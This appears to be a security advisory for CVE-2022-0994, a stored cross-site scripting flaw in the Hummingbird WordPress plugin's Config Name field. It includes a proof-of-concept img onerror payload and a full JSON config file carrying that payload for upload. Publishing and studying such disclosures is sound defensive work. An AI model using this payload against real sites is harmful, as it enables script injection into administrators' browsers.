Hummingbird < 3.3.2 – Admin+ Stored Cross-Site Scripting | CVE 2022-0994

Description

The plugin does not sanitise and escape the Config Name, which could allow high privilege users, such as admin to perform cross-Site Scripting attacks even when the unfiltered_html capability is disallowed

Proof of Concept

Go to Hummingbird's Settings > Configs > edit the "Name and Description" and put the following payload in the Name field: <img src onerror=alert(/XSS/)>

Save and Click 'Apply' to trigger the XSS

Go to Hummingbird's Settings > Configs and Upload the following config
{
  "id": 1,
  "name": "<img src onerror=alert(/XSS/)>",
  "description": "Xss",
  "config": {
    "configs": {
      "settings": {
        "advanced": {
          "query_string": false,
          "emoji": false,
          "cart_fragments": false,
          "lazy_load": {
            "enabled": false
          }
        },
        "database": {
          "reports": {
            "enabled": false
          }
        },
        "gravatar": {
          "enabled": true
        },
        "page_cache": {
          "enabled": true,
          "detection": "auto",
          "integrations": {
            "varnish": false,
            "opcache": false
          },
          "preload": false
        },
        "performance": [],
        "rss": {
          "enabled": true,
          "duration": 3600
        },
        "settings": {
          "accessible_colors": false,
          "remove_settings": false,
          "remove_data": false,
          "control": true
        },
        "uptime": {
          "enabled": false
        }
      }
    },
    "strings": {
      "advanced": [
        "Remove query strings from assets - Inactive\nRemove Emoji JS & CSS files - Inactive\nDisable WooCommerce cart fragments - Inactive\nComments lazy loading - Inactive\n"
      ],
      "database": [
        ""
      ],
      "gravatar": [
        "Gravatar cache - Active\n"
      ],
      "page_cache": [
        "Page cache - Active\nFile change detection - Auto\nPurge Varnish cache - Inactive\nPurge OpCache - Inactive\nCache preloading - Inactive\n"
      ],
      "rss": [
        "RSS caching - Active\n"
      ],
      "settings": [
        "High contrast mode - Inactive\nRemove settings on uninstall - Inactive\nRemove data on uninstall - Inactive\nCache control in admin bar - Active\n"
      ],
      "uptime": [
        "Uptime - Inactive\n"
      ]
    }
  },
  "plugin": "1081721"
}